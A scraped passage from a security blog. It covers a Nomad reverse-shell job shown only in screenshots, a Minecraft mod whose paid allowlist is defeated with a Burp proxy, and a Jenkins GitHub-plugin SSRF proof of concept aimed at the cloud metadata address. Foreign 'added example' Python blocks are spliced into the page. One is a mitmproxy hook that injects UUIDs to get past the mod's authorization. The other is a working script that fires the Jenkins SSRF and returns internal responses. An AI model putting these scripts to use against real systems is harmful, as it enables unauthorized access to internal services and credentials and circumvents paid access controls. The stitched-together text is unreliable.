<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpwKuu3OKdc7JsBY_6-Tyepo-MwCH49LpHKoWn8aHcRx3Pu5Ld6tOlZaX5Df4MZMyNqZ2rvU5O4iMeIJuy4eKgoB1XSW7XAXY5FPktwtvdxlqknXXgmPRqutQEXG05PE49G854mbD3jDg/s1600/Screen+Shot+2018-12-18+at+11.27.17+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="167" data-original-width="1600" height="66" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpwKuu3OKdc7JsBY_6-Tyepo-MwCH49LpHKoWn8aHcRx3Pu5Ld6tOlZaX5Df4MZMyNqZ2rvU5O4iMeIJuy4eKgoB1XSW7XAXY5FPktwtvdxlqknXXgmPRqutQEXG05PE49G854mbD3jDg/s640/Screen+Shot+2018-12-18+at+11.27.17+AM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
Stopping the job</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGcpIVEPCahotTk1ZYDNLcPI1gxdOD2jjrjTD9qSd_4bGE4Z29llePq3R0qj_VfAdixes_4NrHNIktGdBqLzEr7SRrPudfMT02usJ4DMltSbMdwu5fa3OWHMcd16Y6_eBE0GIU7NN5lxQ/s1600/Screen+Shot+2018-12-18+at+11.24.30+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="517" data-original-width="1600" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGcpIVEPCahotTk1ZYDNLcPI1gxdOD2jjrjTD9qSd_4bGE4Z29llePq3R0qj_VfAdixes_4NrHNIktGdBqLzEr7SRrPudfMT02usJ4DMltSbMdwu5fa3OWHMcd16Y6_eBE0GIU7NN5lxQ/s400/Screen+Shot+2018-12-18+at+11.24.30+AM.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiza2dVv-hNAWpTeFCsysIeNHkSGnqjc57K_a7cNAN4tzs9CuC6Qv80DEpXXjX72NRXdr9JN82olebdExMZnMXn76riN5rc1gv4R9u3NALJZNMoTvwCSEFF2Graub0e56_KdT2W84YYaFs/s1600/Screen+Shot+2018-12-18+at+11.31.58+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="78" data-original-width="1358" height="36" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiza2dVv-hNAWpTeFCsysIeNHkSGnqjc57K_a7cNAN4tzs9CuC6Qv80DEpXXjX72NRXdr9JN82olebdExMZnMXn76riN5rc1gv4R9u3NALJZNMoTvwCSEFF2Graub0e56_KdT2W84YYaFs/s640/Screen+Shot+2018-12-18+at+11.31.58+AM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
forcefully run the garbage collection</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFOlgacL3qsblM44YqxlQnz_DDMbjnR4pL24ieUKbUQTSVsSbh7w3uuikQSxwDo5VF0d2kqhIFf20cwo1mX3ZU84S9jeWa5yhj1kpRoBbPCsAUrzNeA9kDvcBWiktEt2YQkzlFkga7JVI/s1600/jobs-gc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="449" data-original-width="1600" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFOlgacL3qsblM44YqxlQnz_DDMbjnR4pL24ieUKbUQTSVsSbh7w3uuikQSxwDo5VF0d2kqhIFf20cwo1mX3ZU84S9jeWa5yhj1kpRoBbPCsAUrzNeA9kDvcBWiktEt2YQkzlFkga7JVI/s400/jobs-gc.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
validating that the job was deleted</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
OK let's get a reverse shell. I used the following hcl file:</div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://gist.github.com/carnal0wnage/4a436a8dc0dcb142a8c836e48916dd71" target="_blank">https://gist.github.com/carnal0wnage/4a436a8dc0dcb142a8c836e48916dd71</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIxyOpUjaCcIBoC-8xsjCexQp3oU02WRDD8flfVpDpLR9HV5Hej75FG8INf81-qfu1A60pooioeS53lXp4I8KH-vyr5bjKVNwyIpaMJ6fAMDlwxuavGkmmAYMhmnSiWuupytGWvwKC7us/s1600/Screen+Shot+2018-12-18+at+11.37.24+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="188" data-original-width="1600" height="74" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIxyOpUjaCcIBoC-8xsjCexQp3oU02WRDD8flfVpDpLR9HV5Hej75FG8INf81-qfu1A60pooioeS53lXp4I8KH-vyr5bjKVNwyIpaMJ6fAMDlwxuavGkmmAYMhmnSiWuupytGWvwKC7us/s640/Screen+Shot+2018-12-18+at+11.37.24+AM.png" width="640" /></a></div>
<div style="text-align: center;">
Reverse shell job</div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmN0UPapQTUMZZ1C1GTVzX7TOjB9kb0ytM5wk2lfP-sa4AoCtAlQXXZ6vcdRLvm4HiUEXI1GV27O6oTICDdDgAPzrZS4IYSWxoEBemfGdK4014yBRy_7QC49fRkCRCaE3V7_pcoNATjl4/s1600/Screen+Shot+2018-12-18+at+11.37.11+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="541" data-original-width="1600" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmN0UPapQTUMZZ1C1GTVzX7TOjB9kb0ytM5wk2lfP-sa4AoCtAlQXXZ6vcdRLvm4HiUEXI1GV27O6oTICDdDgAPzrZS4IYSWxoEBemfGdK4014yBRy_7QC49fRkCRCaE3V7_pcoNATjl4/s640/Screen+Shot+2018-12-18+at+11.37.11+AM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
Shell from nomad</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: left;">
-CG</div>
<br />
Info on locking nomad down via ACLs:<br />
<a href="https://www.nomadproject.io/guides/security/acl.html" target="_blank">https://www.nomadproject.io/guides/security/acl.html</a><br />
<br />
Minecraft Mod, Follow up, and Java Reflection (2019-05-14)<br />
<br />
After <a href="https://carnal0wnage.attackresearch.com/2019/05/minecraft-mod-mothers-day-and-hacker-dad.html">yesterday's post</a>, I received a ton of interesting and creative responses regarding how to get around the mod's restrictions, which is what I love about our community. <a href="https://twitter.com/mubix">Mubix</a> was the first person to reach out and suggest hijacking calls to Pastebin using /etc/hosts (which I did try but was having some wonky behavior with OSX) and there were other suggestions as well with regards to hijacking DNS and pretending to be the site (Pastebin).<br />
<br />
However, my FAVORITE suggestion came from a co-worker of mine (and all around super cool/talented hacker) <a href="https://twitter.com/fletchto99">Matt Langlois</a>. He had an idea for a better workaround. One that didn't require proxying web traffic or for you to even be connected to the internet. He decided to override the code that checks the list of allowed users and inject our UUID into that list. It works beautifully but rather than try to explain the details in this blog post, I <a href="https://blog.fletchto99.com/2019/may/minecraft-mod-reversing/">suggest you visit his blog post to check out the details</a>.<br />
<br />
The gist is that Java reflection allows you to override methods in memory and this is exactly what Matt did. So - <a href="https://blog.fletchto99.com/2019/may/minecraft-mod-reversing/">go check out the blog post!</a><br />
<br />
Posted by <a href="http://www.blogger.com/profile/16815248087217800849">cktricky</a><br />
<br />
Minecraft Mod, Mother's Day, and A Hacker Dad (2019-05-13)<br />
<br />
Over the weekend my wife was feeling under the weather. This meant we were stuck indoors and, since she was sick on Mother's Day weekend (a less than ideal situation), I needed to keep my son as occupied as possible so she could rest and recuperate.<br />
<br />
When I asked my son what he wanted to do, he responded with a new Minecraft mod he'd seen on one of these YouTubers' channels. The mod allows you to be various Marvel superheroes! Except, the mod version we downloaded... well, it lacked the suits he'd seen on YouTube (of course it did).<br />
<br />
Did my homework, realized he wanted a version that was only released if you were a Patreon supporter. Now, I'm totally cool giving 5 bucks for software that somebody poured their heart into and with having recently watched Endgame... the desire for the Iron man stuff shown in this paid-for-mod was larger than the desire to hold on to my 5 dollars. Went on Patreon, donated the $5, and downloaded the mod. Fired it up, everything appeared fine... then I got this...<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJoBsg7lJwc-pExzQk14EmxixuUXd0OfgqP2G0QjHNt-bpRCEpTdvdRr9ZRPggZCr_c4QsJ7RQFHle07pV4Rf3km0n6tF6Ac_3edK73XNn-X6ceBwNkNnWBSf5fIQZneESt2_Vnmdbw-VF/s1600/Screen+Shot+2019-05-12+at+7.27.48+PM.png" imageanchor="1"><img border="0" height="369" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJoBsg7lJwc-pExzQk14EmxixuUXd0OfgqP2G0QjHNt-bpRCEpTdvdRr9ZRPggZCr_c4QsJ7RQFHle07pV4Rf3km0n6tF6Ac_3edK73XNn-X6ceBwNkNnWBSf5fIQZneESt2_Vnmdbw-VF/s640/Screen+Shot+2019-05-12+at+7.27.48+PM.png" width="640" /></a><br />
<br />
What? Seriously? Well, I go back in and re-read the Patreon message...<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibQoANN_PqVX12F8CoVqkYjJQSQ0r6vqIk129uyJAgA-J85GzYyzQvBUkb9OlxQVV1f5K3aRcDfXDSaUy2YEhaShJhYb-g-xoIkOrPu4Kf8rmjildGTvC7WZbJ_6-7f5TXtZlCQCOxqVtp/s1600/Screen+Shot+2019-05-12+at+8.03.27+PM.png" imageanchor="1"><img border="0" height="377" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibQoANN_PqVX12F8CoVqkYjJQSQ0r6vqIk129uyJAgA-J85GzYyzQvBUkb9OlxQVV1f5K3aRcDfXDSaUy2YEhaShJhYb-g-xoIkOrPu4Kf8rmjildGTvC7WZbJ_6-7f5TXtZlCQCOxqVtp/s640/Screen+Shot+2019-05-12+at+8.03.27+PM.png" width="640" /></a><br />
<br />
Ugh, so a couple issues here. One, we wanted access now. Taking a day (maybe) to add us to some magical list is less than ideal (which, the creator still hasn't responded to my emails so perhaps... never?). Secondly, I'm wondering if this is some sort of "donate $5 every month to continue being on the magical list to use this mod". And, if I already paid for software, I just plain old don't like being at the mercy of someone else.<br />
<br />
Time to be the hacker dad hero my son needs :P (plus, I wanted to teach him a life lesson about the hacker spirit).<br />
<br />
Okay so... a mod is just a jar file... let's open this up with JD-GUI and search for "Unauthorized use".<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLL8LcjOLRozpik5LokLD1XpNPE3uduThZFr_j3mfW5oK_yWEOswb2yd_0K_CcE5cadfm6rC1wUkaH2S8hEViLGATTd-m2cYYKV38ww6WMLoFg1pWvEPxgKoYocACHjAzg1lmhVu_sQ3lS/s1600/Screen+Shot+2019-05-12+at+8.10.35+PM.png" imageanchor="1"><img border="0" height="368" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLL8LcjOLRozpik5LokLD1XpNPE3uduThZFr_j3mfW5oK_yWEOswb2yd_0K_CcE5cadfm6rC1wUkaH2S8hEViLGATTd-m2cYYKV38ww6WMLoFg1pWvEPxgKoYocACHjAzg1lmhVu_sQ3lS/s400/Screen+Shot+2019-05-12+at+8.10.35+PM.png" width="400" /></a><br />
<br />
Each of these handlers has the same code: they all look basically identical, and they check whether you're in a list. If you're not, you don't get to play.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaMoLO8Wu7NjCsABeoTYE8oDCdj9YPYRlClpBh2weuUkGxaITiXkA7ap95hMrrbgOxGaxdPIYj_OtmLjI_QfynWwaNwVJBudKlSjmgb5sQFwSVrTxHwvIwlzKsm7ThyVwneTK2BtkCZKO4/s1600/Screen+Shot+2019-05-12+at+8.14.32+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaMoLO8Wu7NjCsABeoTYE8oDCdj9YPYRlClpBh2weuUkGxaITiXkA7ap95hMrrbgOxGaxdPIYj_OtmLjI_QfynWwaNwVJBudKlSjmgb5sQFwSVrTxHwvIwlzKsm7ThyVwneTK2BtkCZKO4/s1600/Screen+Shot+2019-05-12+at+8.14.32+PM.png" /></a></div>
<br />
So where is this list coming from? Looks like <b>SuperHeroesBetaTesterChecker.getList()</b><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDZeEDAhbDKDYCLFttljhL92LJu5Ku_R4FSQKWrt7i4pZ0uN5nC0KdsqlCPzwgoMmcrCTNua6OeiSyHFx3lF1Ft4iSkPY6u-z4QaDqzv3e-GIihHLKjh39nVCt3JKGpX7M9sFEjwOZkKHo/s1600/Screen+Shot+2019-05-12+at+8.18.32+PM.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDZeEDAhbDKDYCLFttljhL92LJu5Ku_R4FSQKWrt7i4pZ0uN5nC0KdsqlCPzwgoMmcrCTNua6OeiSyHFx3lF1Ft4iSkPY6u-z4QaDqzv3e-GIihHLKjh39nVCt3JKGpX7M9sFEjwOZkKHo/s1600/Screen+Shot+2019-05-12+at+8.18.32+PM.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-dtI51eOy_vADDRSBnbYPbAA7grt4X5F84vKx-c37swUwrIqRIHR7FC7veu0o42d7qHBpHK5tFTaQP7tT8eOpD24hrWAnyAcP_6qKPiyLx4J5n68Sw6V4i_wTAP3ryeAoaK3CINKK2L0x/s1600/Screen+Shot+2019-05-12+at+8.20.42+PM.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-dtI51eOy_vADDRSBnbYPbAA7grt4X5F84vKx-c37swUwrIqRIHR7FC7veu0o42d7qHBpHK5tFTaQP7tT8eOpD24hrWAnyAcP_6qKPiyLx4J5n68Sw6V4i_wTAP3ryeAoaK3CINKK2L0x/s1600/Screen+Shot+2019-05-12+at+8.20.42+PM.png" /></a><br />
<br />
What? Are we seriously pulling down some list from pastebin.com to find out who our authorized users are?<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpo8ZUqkqWKafE5s9k2gbUvOAD7cTIWOlaL8qOy0scfzd2xSUhTywojmMgoSpY8_ljSw13pOfsRaQhztvezQEmZvM0DgKlC7BCLlcGrPjlhNa78tZJxrrOgiUIWTBri10zon-91ZW251Md/s1600/Screen+Shot+2019-05-12+at+8.23.12+PM.png" imageanchor="1"><img border="0" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpo8ZUqkqWKafE5s9k2gbUvOAD7cTIWOlaL8qOy0scfzd2xSUhTywojmMgoSpY8_ljSw13pOfsRaQhztvezQEmZvM0DgKlC7BCLlcGrPjlhNa78tZJxrrOgiUIWTBri10zon-91ZW251Md/s320/Screen+Shot+2019-05-12+at+8.23.12+PM.png" width="320" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiCGrJqzXKZRr5ZQLJ1VLf83cnZCV7r69lZA1-4jadTJvd0qrq3qcOur1YmlD5n4a05lmFZEhrBO12R7Xlqm2wqktVyiHF-sb_7Oi-U8Muxr8I1zLsTkhUoBQKKuqcjo_1_ip5bxW0yaDb/s1600/giphy.gif" imageanchor="1"><img border="0" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiCGrJqzXKZRr5ZQLJ1VLf83cnZCV7r69lZA1-4jadTJvd0qrq3qcOur1YmlD5n4a05lmFZEhrBO12R7Xlqm2wqktVyiHF-sb_7Oi-U8Muxr8I1zLsTkhUoBQKKuqcjo_1_ip5bxW0yaDb/s320/giphy.gif" width="320" /></a><br />
<br />
Alright.... so... UUIDs? As it turns out, UUIDs map to usernames, that information is publicly retrievable, and this handy site helps: <a href="https://mcuuid.net/">https://mcuuid.net/</a>.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo19o8Ac18XsMO3aVXDKpyC4KsMhRih_IPMsNqyU88pq-e3siNidNxTuau8wurDvP_WjXiRRrNvcIGKIqCRIE3wc9sIg5F32unEHsSroeWJSA5QiAeJUJ2CWxpj6IEUPdKm9QqT0em5k_y/s1600/Screen+Shot+2019-05-12+at+8.27.00+PM.png" imageanchor="1"><img border="0" height="98" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo19o8Ac18XsMO3aVXDKpyC4KsMhRih_IPMsNqyU88pq-e3siNidNxTuau8wurDvP_WjXiRRrNvcIGKIqCRIE3wc9sIg5F32unEHsSroeWJSA5QiAeJUJ2CWxpj6IEUPdKm9QqT0em5k_y/s320/Screen+Shot+2019-05-12+at+8.27.00+PM.png" width="320" /></a><br />
Cool, so now I know our UUIDs (and you do too but, again, anyone can find that out, so it's really whatever).<br />
<br />
Originally, I tried decompiling, changing the source and recompiling. At one point I even had my environment set up to compile from Eclipse with Forge and this source code. But this was taking a couple of hours and I needed a <b><u>quick</u></b> solution. This is where Burp came into play. Here is what I did.<br />
<br />
1. Set Burp to listen on all interfaces under the proxy options<br />
2. Exported its CA certificate and installed it on both my son's machine and mine so the proxy was trusted for HTTPS traffic (no cert warnings)<br />
3. Set both machines to send all of their HTTPS traffic through the Burp proxy<br />
4. Added a few proxy match & replace rules that replace one of the other UUIDs in the response with ours (and usernames for dev-level access because... why not)<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_WxhTMyfaminRiUOSTjA-ndMA9gc24ALIGpjlJecZQoawUvxXNBMZ2m0rJEKQJs4rX3epGaVLr9xJeFihbv-OZwKrw7w1I8pnoNcK_637JZud7RtD65GG6NG0JtEc1aLnWbZy-FaO1f_1/s1600/Screen+Shot+2019-05-13+at+11.41.50+AM.png" imageanchor="1"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_WxhTMyfaminRiUOSTjA-ndMA9gc24ALIGpjlJecZQoawUvxXNBMZ2m0rJEKQJs4rX3epGaVLr9xJeFihbv-OZwKrw7w1I8pnoNcK_637JZud7RtD65GG6NG0JtEc1aLnWbZy-FaO1f_1/s640/Screen+Shot+2019-05-13+at+11.41.50+AM.png" width="640" /></a><br />
<br />
That's basically it. Once our machines started routing traffic through my Burp proxy, every response from pastebin.com containing those UUIDs automatically had ours added to the list of authorized users, and it worked like a charm.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW0iIqss0UMKlttn8_TrNVAo7SuCothlgQmFPCOtTtF8fa4bA3YwRosPfB2yIRQbmT0wWUgMrITrIo8NqVZ8Fj20dabL_YvAWVLKnvwKxQOJYv_R3dnmQpk6t-uuSbvGtMgs3-037QJuE8/s1600/Screen+Shot+2019-05-13+at+11.49.32+AM.png" imageanchor="1"><img border="0" height="374" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW0iIqss0UMKlttn8_TrNVAo7SuCothlgQmFPCOtTtF8fa4bA3YwRosPfB2yIRQbmT0wWUgMrITrIo8NqVZ8Fj20dabL_YvAWVLKnvwKxQOJYv_R3dnmQpk6t-uuSbvGtMgs3-037QJuE8/s640/Screen+Shot+2019-05-13+at+11.49.32+AM.png" width="640" /></a><br />
<br />
Note that I have not given detailed instructions on the four steps above because there are already tons of tutorials out there if you're not already familiar with Burp & proxying web traffic.<br />
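The security-relevant point of the four steps above is that the whole authorization decision runs on the player's machine: the jar fetches a list, tests membership, and trusts whatever its own TLS trust store says. Once that machine trusts a proxy CA, the list can be rewritten in transit. The following is an added example (editor's code, not the mod's or the post's) that shows the client-side check the decompiled handlers perform, the response edit the Burp match & replace rule made, and a mitmproxy hook that does the same job in script form. The sample list, the UUIDs and the pastebin host are constructed placeholders, and the exact comparison the mod uses is an assumption.

```python
"""Added example (editor's code, not the mod's or the post's): the client-side
allowlist check the decompiled handlers perform, the response rewrite the Burp
match & replace rule performed, and a mitmproxy hook that does the same job.
The sample list, the UUIDs and the pastebin host are constructed placeholders."""
from typing import Iterable, Set

# Constructed stand-in for the pastebin paste the mod fetched: one UUID per line.
RAW_LIST = (
    "d4a5f1b2-3c4e-4f50-8a6b-7c8d9e0f1a2b\n"
    "0e1f2a3b-4c5d-4e6f-8091-a2b3c4d5e6f7\n"
)

# The UUIDs we want on the list (constructed; look yours up as the post describes).
OUR_UUIDS = ["11111111-2222-4333-8444-555555555555"]


def normalize(uuid_text: str) -> str:
    """Compare dashed and undashed forms alike (mcuuid.net prints both); the mod's
    exact comparison is not visible on the page, so this is an assumption."""
    return uuid_text.strip().lower().replace("-", "")


def is_authorized(list_text: str, player_uuid: str) -> bool:
    """What each handler does: fetch the list, test membership, refuse otherwise.
    Both inputs reach the check on a machine the player controls, so the player
    can alter either one; TLS does not help once that machine trusts a proxy CA."""
    allowed: Set[str] = {normalize(line) for line in list_text.splitlines() if line.strip()}
    return normalize(player_uuid) in allowed


def rewrite_list(list_text: str, extra_uuids: Iterable[str]) -> str:
    """The proxy-side edit: append our UUIDs once, leaving the original entries
    and line endings untouched so the mod still parses the paste."""
    present = {normalize(line) for line in list_text.splitlines()}
    out = list_text if (not list_text or list_text.endswith("\n")) else list_text + "\n"
    for uuid_text in extra_uuids:
        if normalize(uuid_text) not in present:
            out += uuid_text.strip() + "\n"
            present.add(normalize(uuid_text))
    return out


# mitmproxy addon hook, the scripted equivalent of the Burp match & replace rule.
# Only active under `mitmdump -s this_file.py` (mitmproxy assumed installed);
# importing this module without mitmproxy just skips the hook.
try:
    from mitmproxy import http  # type: ignore

    def response(flow: "http.HTTPFlow") -> None:
        if flow.response is not None and flow.request.pretty_host.endswith("pastebin.com"):
            flow.response.text = rewrite_list(flow.response.text, OUR_UUIDS)
except ImportError:
    pass
```

The rewrite only has to keep the paste parseable, which is why it appends rather than replacing an existing entry. For a mod author the lesson is the mirror image: a list fetched by the client is not a gate, and the only real fix is to make the decision server-side (signing the list with a key the client pins raises the bar, but the jar itself can still be patched, which is the decompile-and-recompile route the post tried first).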
<br />
Let's summarize. We paid $5 and got told we still needed special permission to use this mod. That didn't sit well, I wanted to get this working, and I figured I could teach my son a little bit about computers/hacking. Now, did I email the creator of the mod? Yes, in fact I let them know what I found and the workaround, and I was very upfront about that. I also provided our usernames in case the creator felt like adding them (though I doubt he's feeling super generous). But we had some fun, learned a little, and got to use the mod.<br />
<br />
Having said all that, if you're in a position to donate even a few bucks for software that someone spends a good chunk of their time writing, I'd say do it. But if they don't deliver as promised... put on your hacker hat :-).<br />
<br />
<br />
<br />cktrickyhttp://www.blogger.com/profile/16815248087217800849noreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-27153271887369579072019-03-05T14:01:00.003-05:002019-03-05T14:01:41.948-05:00Jenkins - CVE-2018-1000600 PoC<br />
<br />
<span style="color: #444444;">This is the second exploit from Orange Tsai's blog post:</span><br />
<span style="color: #444444;"><br /></span>
<a href="https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html" target="_blank"><span style="color: #444444;">https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html</span></a><br />
<span style="color: #444444;"><span style="background-color: white; font-family: "ubuntu";"><br /></span>
<span style="background-color: white; font-family: "ubuntu";">Chained with CVE-2018-1000600 to a Pre-auth Fully-responded SSRF</span></span><br />
<span style="background-color: white;"><span style="color: #444444; font-family: "ubuntu";"><a href="https://jenkins.io/security/advisory/2018-06-25/#SECURITY-915">https://jenkins.io/security/advisory/2018-06-25/#SECURITY-915</a></span></span><br />
<span style="color: #444444;"><span style="background-color: white;"><br /></span>
<span style="background-color: white;">This affects the GitHub plugin, which is installed by default. However, I learned that when you spin up a new Jenkins instance it pulls all the updated plugins (also by default). I'm honestly not sure how often people leave update-to-latest-plugin on by default, but it does seem to knock down some of this stuff.</span></span><br />
<span style="color: #444444;"><span style="background-color: white;"><br /></span>
<span style="background-color: white;">The exploit works against GitHub Plugin versions up to and including 1.29.1.</span></span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">When I installed Jenkins today (25 Feb 19) it installed 1.29.4 by default, so the PoC below does NOT work against a fresh install.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">From the blog post:</span><br />
<span style="color: #444444;"><br /></span>
<br />
<blockquote class="tr_bq">
<span style="color: #444444;"><span style="background-color: #f8f8f8; font-family: "ubuntu"; font-size: 13.2px;">CSRF vulnerability and missing permission checks in GitHub Plugin allowed capturing credentials</span> </span></blockquote>
<blockquote class="tr_bq">
<span style="background-color: white; color: #444444; font-family: "ubuntu"; font-size: 13.2px;">It can extract any stored credentials with known credentials ID in Jenkins. But the credentials ID is a random UUID if there is no user-supplied value provided. So it seems impossible to exploit this?(Or if someone know how to obtain credentials ID, please tell me!)</span></blockquote>
<blockquote class="tr_bq">
<span style="background-color: white; color: #444444; font-family: "ubuntu"; font-size: 13.2px;">Although it can’t extract any credentials without known credentials ID, there is still another attack primitive - a fully-response SSRF! We all know how hard it is to exploit a Blind SSRF, so that’s why a fully-responded SSRF is so valuable!</span></blockquote>
<div style="background-color: white; box-sizing: border-box; font-family: "ubuntu"; font-weight: 300; line-height: 1.1; margin: 1.2em 0px; position: relative;">
<span style="color: #444444;">PoC:</span></div>
<pre style="background-color: #f8f8f8; border-radius: 5px; border: 0px; box-sizing: border-box; font-family: "source code pro", monospace; font-size: 0.9em; line-height: 1.45; margin-bottom: 1.1em; overflow-wrap: break-word; padding: 10px 20px; white-space: pre-wrap;"><code style="background-color: transparent; border-radius: 0px; box-sizing: border-box; font-family: "source code pro", monospace; font-size: inherit; padding: 0px;"><span style="color: #444444;">http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword
?apiUrl=http://169.254.169.254/%23
&login=orange
&password=tsai</span></code></pre>
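To turn the PoC above into something repeatable, here is an added example (editor's code, not from the page, from Orange Tsai's post or from Jenkins) that builds the same request and returns whatever the target answered, which is the "fully responded" part of the primitive. The Jenkins base URL, the user name in the path and the use of an unauthenticated GET are assumptions taken from the PoC as written; jenkins.local, orange/tsai and 169.254.169.254 are the page's own values. The reading of why the PoC ends in %23 (the `#` turns anything the plugin appends to apiUrl into a URL fragment) is the editor's, not stated on the page.

```python
"""Added example, not code from the page or from Jenkins: builds and sends the
createTokenByPassword SSRF request shown above and returns what the target
answered. The Jenkins URL, the user name in the path, and the unauthenticated
GET are assumptions; jenkins.local and 169.254.169.254 are the page's values."""
import urllib.error
import urllib.parse
import urllib.request
from typing import Tuple

CREATOR = "org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator"


def build_ssrf_url(jenkins: str, target: str, user: str = "admin",
                   login: str = "orange", password: str = "tsai") -> str:
    """Reproduce the PoC URL. The trailing '#' is encoded as %23; whatever path the
    plugin appends to apiUrl then lands in the fragment, so the outbound request
    goes to `target` itself (editor's reading of the PoC, not stated on the page)."""
    path = f"/securityRealm/user/{user}/descriptorByName/{CREATOR}/createTokenByPassword"
    query = urllib.parse.urlencode(
        {"apiUrl": target + "#", "login": login, "password": password}
    )
    return jenkins.rstrip("/") + path + "?" + query


def fetch_via_ssrf(jenkins: str, target: str, timeout: float = 10.0) -> Tuple[int, str]:
    """Send the request without credentials and return (HTTP status, body).
    On the vulnerable plugin the body carries the target's response; a fixed
    plugin answers with a 4xx, which is returned rather than raised."""
    req = urllib.request.Request(build_ssrf_url(jenkins, target), method="GET")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")
```

Two practical notes: the fetched body is the plugin's error text wrapped around the target's response, so expect to trim it; and against AWS, 169.254.169.254 only answers a plain GET under IMDSv1, since IMDSv2 requires a PUT for a session token first, which this primitive cannot send.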
<span style="color: #444444;"><span style="background-color: white; font-family: "ubuntu";"><br /></span><span style="font-family: "ubuntu";"><span style="background-color: white;">To get old versions of the plugin and info you can go to </span></span> <span style="background-color: white; font-family: "ubuntu";"><br /></span>
<span style="background-color: white;"><span style="font-family: "ubuntu";"><a href="https://wiki.jenkins.io/display/JENKINS/GitHub+Branch+Source+Plugin" target="_blank">https://wiki.jenkins.io/display/JENKINS/GitHub+Branch+Source+Plugin</a></span></span></span><br />
<span style="color: #444444;"><span style="background-color: white;"><span style="font-family: "ubuntu";"><br /></span></span>
<span style="background-color: white;"><span style="font-family: "ubuntu";">download old versions</span></span></span><br />
<span style="background-color: white;"><span style="color: #444444; font-family: "ubuntu";"><a href="https://updates.jenkins.io/download/plugins/github-branch-source/" target="_blank">https://updates.jenkins.io/download/plugins/github-branch-source/</a></span></span><br />
